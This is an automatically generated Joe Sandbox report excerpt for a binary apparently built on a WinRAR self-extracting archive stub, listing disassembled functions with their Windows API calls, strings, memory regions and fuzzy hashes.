                                                            • Associated: 00000000.00000002.1687415968.0000000000D23000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_cc0000_kIdT4m0aa4.jbxd
                                                            Similarity
                                                            • API ID: _wcslen
                                                            • String ID: </p>$</style>$<br>$<style>$>
                                                            • API String ID: 176396367-3568243669
                                                            • Opcode ID: 8639ca1030e84c5f529d129a6f453bfd679af5a635257a744625496847d08ccf
                                                            • Instruction ID: 6ff7ba4a208aa532897f291575f68526f314e0ada4a5112e245f6565554f92b2
                                                            • Opcode Fuzzy Hash: 8639ca1030e84c5f529d129a6f453bfd679af5a635257a744625496847d08ccf
                                                            • Instruction Fuzzy Hash: F551046E74032295DB30AA259811777B3E2DFA5750F68042BFFD18B7C0FB758E818261
                                                            Function 00CEF68D Relevance: 10.7, APIs: 7, Instructions: 152fileCOMMON
                                                            Download Yara Rule
                                                            APIs
                                                            • GetConsoleCP.KERNEL32(00000000,00000000,?,?,?,?,?,?,?,00CEFE02,00000000,00000000,00000000,00000000,00000000,?), ref: 00CEF6CF
                                                            • __fassign.LIBCMT ref: 00CEF74A
                                                            • __fassign.LIBCMT ref: 00CEF765
                                                            • WideCharToMultiByte.KERNEL32(?,00000000,00000000,00000001,00000000,00000005,00000000,00000000), ref: 00CEF78B
                                                            • WriteFile.KERNEL32(?,00000000,00000000,00CEFE02,00000000,?,?,?,?,?,?,?,?,?,00CEFE02,00000000), ref: 00CEF7AA
                                                            • WriteFile.KERNEL32(?,00000000,00000001,00CEFE02,00000000,?,?,?,?,?,?,?,?,?,00CEFE02,00000000), ref: 00CEF7E3
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1687306160.0000000000CC1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00CC0000, based on PE: true
                                                            • Associated: 00000000.00000002.1687290150.0000000000CC0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1687336312.0000000000CF3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1687358037.0000000000CFE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1687358037.0000000000D05000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1687358037.0000000000D22000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1687415968.0000000000D23000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_cc0000_kIdT4m0aa4.jbxd
                                                            Similarity
                                                            • API ID: FileWrite__fassign$ByteCharConsoleMultiWide
                                                            • String ID:
                                                            • API String ID: 1324828854-0
                                                            • Opcode ID: 1a10e0c6665e977fc4f5ea000eb9c2662eb093864fa6d1dff585486950edf452
                                                            • Instruction ID: a59308952565a12aad10b89e7d33d016f83caa2b6081c8ab4881ef758cc7ecbd
                                                            • Opcode Fuzzy Hash: 1a10e0c6665e977fc4f5ea000eb9c2662eb093864fa6d1dff585486950edf452
                                                            • Instruction Fuzzy Hash: BC5195B1900289AFDB10CFA5DC55BEEBBF4EF09300F14416EE555E7291D630AA42CBA1
                                                            Function 00CE2900 Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 120COMMON
                                                            Download Yara Rule
                                                            APIs
                                                            • _ValidateLocalCookies.LIBCMT ref: 00CE2937
                                                            • ___except_validate_context_record.LIBVCRUNTIME ref: 00CE293F
                                                            • _ValidateLocalCookies.LIBCMT ref: 00CE29C8
                                                            • __IsNonwritableInCurrentImage.LIBCMT ref: 00CE29F3
                                                            • _ValidateLocalCookies.LIBCMT ref: 00CE2A48
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1687306160.0000000000CC1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00CC0000, based on PE: true
                                                            • Associated: 00000000.00000002.1687290150.0000000000CC0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1687336312.0000000000CF3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1687358037.0000000000CFE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1687358037.0000000000D05000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1687358037.0000000000D22000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1687415968.0000000000D23000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_cc0000_kIdT4m0aa4.jbxd
                                                            Similarity
                                                            • API ID: CookiesLocalValidate$CurrentImageNonwritable___except_validate_context_record
                                                            • String ID: csm
                                                            • API String ID: 1170836740-1018135373
                                                            • Opcode ID: 9b0ff00414f9462877fcf717dd2d4eaed830786435422e6d93025eb632845421
                                                            • Instruction ID: a4af6e600449a7f7ed2bdb41fd1e18e2add349fdd0cd8f94d7abb16488d73d64
                                                            • Opcode Fuzzy Hash: 9b0ff00414f9462877fcf717dd2d4eaed830786435422e6d93025eb632845421
                                                            • Instruction Fuzzy Hash: F141DB30A00288AFCF10DF6AC885BAE7BB9EF44314F148065E9159B393D771DA41DF91
                                                            Function 00CD9ED5 Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 114COMMON
                                                            Download Yara Rule
                                                            APIs
                                                            • ShowWindow.USER32(?,00000000), ref: 00CD9EEE
                                                            • GetWindowRect.USER32(?,00000000), ref: 00CD9F44
                                                            • ShowWindow.USER32(?,00000005,00000000), ref: 00CD9FDB
                                                            • SetWindowTextW.USER32(?,00000000), ref: 00CD9FE3
                                                            • ShowWindow.USER32(00000000,00000005), ref: 00CD9FF9
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1687306160.0000000000CC1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00CC0000, based on PE: true
                                                            • Associated: 00000000.00000002.1687290150.0000000000CC0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1687336312.0000000000CF3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1687358037.0000000000CFE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1687358037.0000000000D05000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1687358037.0000000000D22000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1687415968.0000000000D23000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_cc0000_kIdT4m0aa4.jbxd
                                                            Similarity
                                                            • API ID: Window$Show$RectText
                                                            • String ID: RarHtmlClassName
                                                            • API String ID: 3937224194-1658105358
                                                            • Opcode ID: 14334100710e3d8b143fc41e7ba500131f21b43ed7e36342e43eb92e14507964
                                                            • Instruction ID: fdb64cb1e31c66fde1bc8965ee3f7b0f7c71133d067d59caa11f01cad1c1a818
                                                            • Opcode Fuzzy Hash: 14334100710e3d8b143fc41e7ba500131f21b43ed7e36342e43eb92e14507964
                                                            • Instruction Fuzzy Hash: BA41D331004310EFCB225FA5DC48B6B7BA8FF58701F00455AFA4AEA256DB38EA15CF65
                                                            Function 00CD9955 Relevance: 10.6, APIs: 2, Strings: 4, Instructions: 106COMMON
                                                            Download Yara Rule
                                                            APIs
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1687306160.0000000000CC1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00CC0000, based on PE: true
                                                            • Associated: 00000000.00000002.1687290150.0000000000CC0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1687336312.0000000000CF3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1687358037.0000000000CFE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1687358037.0000000000D05000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1687358037.0000000000D22000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1687415968.0000000000D23000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_cc0000_kIdT4m0aa4.jbxd
                                                            Similarity
                                                            • API ID: _wcslen
                                                            • String ID: $&nbsp;$<br>$<style>body{font-family:"Arial";font-size:12;}</style>
                                                            • API String ID: 176396367-3743748572
                                                            • Opcode ID: 65439b8c146d5cfe08c5f52f0b4a4f005c5ba774a8392362f83a26ee8bedee31
                                                            • Instruction ID: 1ff2ea22f4cf5efc82f011bcce338f0387091c0f87963ce3996e2f9bdf295120
                                                            • Opcode Fuzzy Hash: 65439b8c146d5cfe08c5f52f0b4a4f005c5ba774a8392362f83a26ee8bedee31
                                                            • Instruction Fuzzy Hash: 4031903B64438556D634AB919C42B7B73A4EB90320F50442FF69E87380FB70BF4093A5
                                                            Function 00CEC8A4 Relevance: 10.6, APIs: 7, Instructions: 65COMMONLIBRARYCODE
                                                            Download Yara Rule
                                                            APIs
                                                              • Part of subcall function 00CEC868: _free.LIBCMT ref: 00CEC891
                                                            • _free.LIBCMT ref: 00CEC8F2
                                                              • Part of subcall function 00CE8DCC: RtlFreeHeap.NTDLL(00000000,00000000,?,00CEC896,?,00000000,?,00000000,?,00CEC8BD,?,00000007,?,?,00CECCBA,?), ref: 00CE8DE2
                                                              • Part of subcall function 00CE8DCC: GetLastError.KERNEL32(?,?,00CEC896,?,00000000,?,00000000,?,00CEC8BD,?,00000007,?,?,00CECCBA,?,?), ref: 00CE8DF4
                                                            • _free.LIBCMT ref: 00CEC8FD
                                                            • _free.LIBCMT ref: 00CEC908
                                                            • _free.LIBCMT ref: 00CEC95C
                                                            • _free.LIBCMT ref: 00CEC967
                                                            • _free.LIBCMT ref: 00CEC972
                                                            • _free.LIBCMT ref: 00CEC97D
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1687306160.0000000000CC1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00CC0000, based on PE: true
                                                            • Associated: 00000000.00000002.1687290150.0000000000CC0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1687336312.0000000000CF3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1687358037.0000000000CFE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1687358037.0000000000D05000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1687358037.0000000000D22000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1687415968.0000000000D23000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_cc0000_kIdT4m0aa4.jbxd
                                                            Similarity
                                                            • API ID: _free$ErrorFreeHeapLast
                                                            • String ID:
                                                            • API String ID: 776569668-0
                                                            • Opcode ID: bf1448b5a367794c459becf00bdc5ad94e8d71ea07fb2ac2ae3d8aaabc3cc25b
                                                            • Instruction ID: b4fb0e72a834beba8870529c639b8cc0ee1e0faa0912b0e4b778991724d002cc
                                                            • Opcode Fuzzy Hash: bf1448b5a367794c459becf00bdc5ad94e8d71ea07fb2ac2ae3d8aaabc3cc25b
                                                            • Instruction Fuzzy Hash: D7112171580B85AAE530B7B3CD87FCB7BAC9F04B00F444C15B29D660D2DA75B60AA750
                                                            Function 00CDE5EE Relevance: 10.5, APIs: 3, Strings: 3, Instructions: 45libraryloaderCOMMONLIBRARYCODE
                                                            Download Yara Rule
                                                            APIs
                                                            • GetModuleHandleW.KERNEL32(KERNEL32.DLL,?,?,00CDE669,00CDE5CC,00CDE86D), ref: 00CDE605
                                                            • GetProcAddress.KERNEL32(00000000,AcquireSRWLockExclusive), ref: 00CDE61B
                                                            • GetProcAddress.KERNEL32(00000000,ReleaseSRWLockExclusive), ref: 00CDE630
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1687306160.0000000000CC1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00CC0000, based on PE: true
                                                            • Associated: 00000000.00000002.1687290150.0000000000CC0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1687336312.0000000000CF3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1687358037.0000000000CFE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1687358037.0000000000D05000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1687358037.0000000000D22000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1687415968.0000000000D23000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_cc0000_kIdT4m0aa4.jbxd
                                                            Similarity
                                                            • API ID: AddressProc$HandleModule
                                                            • String ID: AcquireSRWLockExclusive$KERNEL32.DLL$ReleaseSRWLockExclusive
                                                            • API String ID: 667068680-1718035505
                                                            • Opcode ID: f5cd57587a903cf35a6deb889793495124549858e960edda4ee42cce3c7a4836
                                                            • Instruction ID: 0c8afae9adf286ae41dfca87cd5aa24d4de1476f1ccda640d61e119ad1813283
                                                            • Opcode Fuzzy Hash: f5cd57587a903cf35a6deb889793495124549858e960edda4ee42cce3c7a4836
                                                            • Instruction Fuzzy Hash: 70F0C23978166AAB0B216E765C8467A62C86A35755300443BFB15DB300EB10CE57AAA1
                                                            Function 00CD146A Relevance: 9.1, APIs: 6, Instructions: 98timeCOMMON
                                                            Download Yara Rule
                                                            APIs
                                                            • SystemTimeToFileTime.KERNEL32(?,?), ref: 00CD14C2
                                                              • Part of subcall function 00CCB146: GetVersionExW.KERNEL32(?), ref: 00CCB16B
                                                            • LocalFileTimeToFileTime.KERNEL32(?,?), ref: 00CD14E6
                                                            • FileTimeToSystemTime.KERNEL32(?,?), ref: 00CD1500
                                                            • TzSpecificLocalTimeToSystemTime.KERNEL32(00000000,?,?), ref: 00CD1513
                                                            • SystemTimeToFileTime.KERNEL32(?,?), ref: 00CD1523
                                                            • SystemTimeToFileTime.KERNEL32(?,?), ref: 00CD1533
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1687306160.0000000000CC1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00CC0000, based on PE: true
                                                            • Associated: 00000000.00000002.1687290150.0000000000CC0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1687336312.0000000000CF3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1687358037.0000000000CFE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1687358037.0000000000D05000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1687358037.0000000000D22000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1687415968.0000000000D23000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_cc0000_kIdT4m0aa4.jbxd
                                                            Similarity
                                                            • API ID: Time$File$System$Local$SpecificVersion
                                                            • String ID:
                                                            • API String ID: 2092733347-0
                                                            • Opcode ID: 59260349d37aac74b76e050f2d5a4cab0063b189252243d714484c0be444f586
                                                            • Instruction ID: 116a628425041425fae7ddcb19d7b4dcb8f64720a2af96792425fd5eeeea57a0
                                                            • Opcode Fuzzy Hash: 59260349d37aac74b76e050f2d5a4cab0063b189252243d714484c0be444f586
                                                            • Instruction Fuzzy Hash: E131D775108345ABC704DFA8D884A9FB7E8BF98714F048A1EF995C3210E734D649CBA6
                                                            Function 00CE2AFA Relevance: 9.1, APIs: 6, Instructions: 60COMMONLIBRARYCODE
                                                            Download Yara Rule
                                                            APIs
                                                            • GetLastError.KERNEL32(?,?,00CE2AF1,00CE02FC,00CDFA34), ref: 00CE2B08
                                                            • ___vcrt_FlsGetValue.LIBVCRUNTIME ref: 00CE2B16
                                                            • ___vcrt_FlsSetValue.LIBVCRUNTIME ref: 00CE2B2F
                                                            • SetLastError.KERNEL32(00000000,00CE2AF1,00CE02FC,00CDFA34), ref: 00CE2B81
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1687306160.0000000000CC1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00CC0000, based on PE: true
                                                            • Associated: 00000000.00000002.1687290150.0000000000CC0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1687336312.0000000000CF3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1687358037.0000000000CFE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1687358037.0000000000D05000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1687358037.0000000000D22000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1687415968.0000000000D23000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_cc0000_kIdT4m0aa4.jbxd
                                                            Similarity
                                                            • API ID: ErrorLastValue___vcrt_
                                                            • String ID:
                                                            • API String ID: 3852720340-0
                                                            • Opcode ID: 0d6925252b89d62c4ed9872d8a0c6f1a089b70730754927989fe41841c2b6f25
                                                            • Instruction ID: 079c0443349c9c496cb619b606790b09eab38698aeb6d253791013228af8ced5
                                                            • Opcode Fuzzy Hash: 0d6925252b89d62c4ed9872d8a0c6f1a089b70730754927989fe41841c2b6f25
                                                            • Instruction Fuzzy Hash: 0201D4321183926FA6242B777C89B3A2B9EEB51774760073AF121560F0EF956E00E545
                                                            Function 00CE97E5 Relevance: 9.0, APIs: 6, Instructions: 50COMMONLIBRARYCODE
                                                            Download Yara Rule
                                                            APIs
                                                            • GetLastError.KERNEL32(?,00D01030,00CE4674,00D01030,?,?,00CE3F73,00000050,?,00D01030,00000200), ref: 00CE97E9
                                                            • _free.LIBCMT ref: 00CE981C
                                                            • _free.LIBCMT ref: 00CE9844
                                                            • SetLastError.KERNEL32(00000000,?,00D01030,00000200), ref: 00CE9851
                                                            • SetLastError.KERNEL32(00000000,?,00D01030,00000200), ref: 00CE985D
                                                            • _abort.LIBCMT ref: 00CE9863
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1687306160.0000000000CC1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00CC0000, based on PE: true
                                                            • Associated: 00000000.00000002.1687290150.0000000000CC0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1687336312.0000000000CF3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1687358037.0000000000CFE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1687358037.0000000000D05000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1687358037.0000000000D22000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1687415968.0000000000D23000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_cc0000_kIdT4m0aa4.jbxd
                                                            Similarity
                                                            • API ID: ErrorLast$_free$_abort
                                                            • String ID:
                                                            • API String ID: 3160817290-0
                                                            • Opcode ID: 528a79b599acde398c730c46c4288a669e85551b2c82edbdafbfb66650d9105d
                                                            • Instruction ID: ea1a8d7c2134f078e651f7c6badbd51e0ce989989c0fbf7f7ee3aad15ccbee66
                                                            • Opcode Fuzzy Hash: 528a79b599acde398c730c46c4288a669e85551b2c82edbdafbfb66650d9105d
                                                            • Instruction Fuzzy Hash: EEF0A4361406D266C73233277C0AB3F2A69DFD2775F250125F528921F2EE348A05D566
                                                            Function 00CDDC3B Relevance: 9.0, APIs: 6, Instructions: 42windowsynchronizationCOMMON
                                                            Download Yara Rule
                                                            APIs
                                                            • WaitForSingleObject.KERNEL32(?,0000000A), ref: 00CDDC47
                                                            • PeekMessageW.USER32(?,00000000,00000000,00000000,00000000), ref: 00CDDC61
                                                            • GetMessageW.USER32(?,00000000,00000000,00000000), ref: 00CDDC72
                                                            • TranslateMessage.USER32(?), ref: 00CDDC7C
                                                            • DispatchMessageW.USER32(?), ref: 00CDDC86
                                                            • WaitForSingleObject.KERNEL32(?,0000000A), ref: 00CDDC91
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1687306160.0000000000CC1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00CC0000, based on PE: true
                                                            • Associated: 00000000.00000002.1687290150.0000000000CC0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1687336312.0000000000CF3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1687358037.0000000000CFE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1687358037.0000000000D05000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1687358037.0000000000D22000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1687415968.0000000000D23000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_cc0000_kIdT4m0aa4.jbxd
                                                            Similarity
                                                            • API ID: Message$ObjectSingleWait$DispatchPeekTranslate
                                                            • String ID:
                                                            • API String ID: 2148572870-0
                                                            • Opcode ID: 757b2e8c3205a196e7b19c4eca095ac1f4282726b75a58896e35b6073d9716c5
                                                            • Instruction ID: 2674951eefd261d97164b843f2e946a66bc480b070475869f001075cc800b20e
                                                            • Opcode Fuzzy Hash: 757b2e8c3205a196e7b19c4eca095ac1f4282726b75a58896e35b6073d9716c5
                                                            • Instruction Fuzzy Hash: CBF03C72A01219BBCB206BA5DD4CEDF7F7DEF51791F004012B60AD2150D6798686CBB1
                                                            Function 00CCC0C5 Relevance: 8.9, APIs: 2, Strings: 3, Instructions: 148COMMON
                                                            Download Yara Rule
                                                            APIs
                                                              • Part of subcall function 00CD05DA: _wcslen.LIBCMT ref: 00CD05E0
                                                              • Part of subcall function 00CCB92D: _wcsrchr.LIBVCRUNTIME ref: 00CCB944
                                                            • _wcslen.LIBCMT ref: 00CCC197
                                                            • _wcslen.LIBCMT ref: 00CCC1DF
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1687306160.0000000000CC1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00CC0000, based on PE: true
                                                            • Associated: 00000000.00000002.1687290150.0000000000CC0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1687336312.0000000000CF3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1687358037.0000000000CFE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1687358037.0000000000D05000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1687358037.0000000000D22000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1687415968.0000000000D23000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_cc0000_kIdT4m0aa4.jbxd
                                                            Similarity
                                                            • API ID: _wcslen$_wcsrchr
                                                            • String ID: .exe$.rar$.sfx
                                                            • API String ID: 3513545583-31770016
                                                            • Opcode ID: d1febb07f671b0b801b1a84eb80f7360c5e779c6559f10bf1405384e151d06bc
                                                            • Instruction ID: 1b6b002f2aabfb91a04491bccd5b6ec8caa981fe83862c45f6b09dfa3b2a39ff
                                                            • Opcode Fuzzy Hash: d1febb07f671b0b801b1a84eb80f7360c5e779c6559f10bf1405384e151d06bc
                                                            • Instruction Fuzzy Hash: 3B413722500351A6C731AF75C882F7FB3B8EF40714F28094EFAA96B181EB619F81D391
                                                            Function 00CDCE87 Relevance: 8.9, APIs: 4, Strings: 1, Instructions: 133COMMON
                                                            Download Yara Rule
                                                            APIs
                                                            • GetTempPathW.KERNEL32(00000800,?), ref: 00CDCE9D
                                                              • Part of subcall function 00CCB690: _wcslen.LIBCMT ref: 00CCB696
                                                            • _swprintf.LIBCMT ref: 00CDCED1
                                                              • Part of subcall function 00CC4092: __vswprintf_c_l.LEGACY_STDIO_DEFINITIONS ref: 00CC40A5
                                                            • SetDlgItemTextW.USER32(?,00000066,00D0946A), ref: 00CDCEF1
                                                            • EndDialog.USER32(?,00000001), ref: 00CDCFFE
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1687306160.0000000000CC1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00CC0000, based on PE: true
                                                            • Associated: 00000000.00000002.1687290150.0000000000CC0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1687336312.0000000000CF3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1687358037.0000000000CFE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1687358037.0000000000D05000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1687358037.0000000000D22000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1687415968.0000000000D23000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_cc0000_kIdT4m0aa4.jbxd
                                                            Similarity
                                                            • API ID: DialogItemPathTempText__vswprintf_c_l_swprintf_wcslen
                                                            • String ID: %s%s%u
                                                            • API String ID: 110358324-1360425832
                                                            • Opcode ID: 7d51ac5bcdf5b0ef2a09bdbc9c63ad3454c7cfbf95ec76520ac03416160f3941
                                                            • Instruction ID: 807bd98755ab0ea970c7a80d8065f31d362af8fa9e2ceadbc015a0375dfc1671
                                                            • Opcode Fuzzy Hash: 7d51ac5bcdf5b0ef2a09bdbc9c63ad3454c7cfbf95ec76520ac03416160f3941
                                                            • Instruction Fuzzy Hash: DE4183B5900259AADF259B90CC85FEE77BCEB04300F4080A7FA09E7251EE709A45DF72
                                                            Function 00CCBB03 Relevance: 8.9, APIs: 3, Strings: 2, Instructions: 127COMMON
                                                            Download Yara Rule
                                                            APIs
                                                            • _wcslen.LIBCMT ref: 00CCBB27
                                                            • GetCurrentDirectoryW.KERNEL32(000007FF,?,?,?,?,00000000,?,?,00CCA275,?,?,00000800,?,00CCA23A,?,00CC755C), ref: 00CCBBC5
                                                            • _wcslen.LIBCMT ref: 00CCBC3B
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1687306160.0000000000CC1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00CC0000, based on PE: true
                                                            • Associated: 00000000.00000002.1687290150.0000000000CC0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1687336312.0000000000CF3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1687358037.0000000000CFE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1687358037.0000000000D05000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1687358037.0000000000D22000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1687415968.0000000000D23000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_cc0000_kIdT4m0aa4.jbxd
                                                            Similarity
                                                            • API ID: _wcslen$CurrentDirectory
                                                            • String ID: UNC$\\?\
                                                            • API String ID: 3341907918-253988292
                                                            • Opcode ID: 5945574e1961e7a75b20b050424858e9eacdf07f72d8b6d4dd8b4abde3ce30a7
                                                            • Instruction ID: 86516d9a72fcccef30eb83d49653b02d65b0cff0250697f18a1ab372ac35f5de
                                                            • Opcode Fuzzy Hash: 5945574e1961e7a75b20b050424858e9eacdf07f72d8b6d4dd8b4abde3ce30a7
                                                            • Instruction Fuzzy Hash: FD41B431400259B6CF21AFA4CC43FEF77A9AF41391F10446AF965A3151EBB5DF90DA60
                                                            Function 00CDB6DD Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 58windowCOMMON
                                                            Download Yara Rule
                                                            APIs
                                                            • LoadBitmapW.USER32(00000065), ref: 00CDB6ED
                                                            • GetObjectW.GDI32(00000000,00000018,?), ref: 00CDB712
                                                            • DeleteObject.GDI32(00000000), ref: 00CDB744
                                                            • DeleteObject.GDI32(00000000), ref: 00CDB767
                                                              • Part of subcall function 00CDA6C2: FindResourceW.KERNEL32(?,PNG,00000000,?,?,?,00CDB73D,00000066), ref: 00CDA6D5
                                                              • Part of subcall function 00CDA6C2: SizeofResource.KERNEL32(00000000,?,?,?,00CDB73D,00000066), ref: 00CDA6EC
                                                              • Part of subcall function 00CDA6C2: LoadResource.KERNEL32(00000000,?,?,?,00CDB73D,00000066), ref: 00CDA703
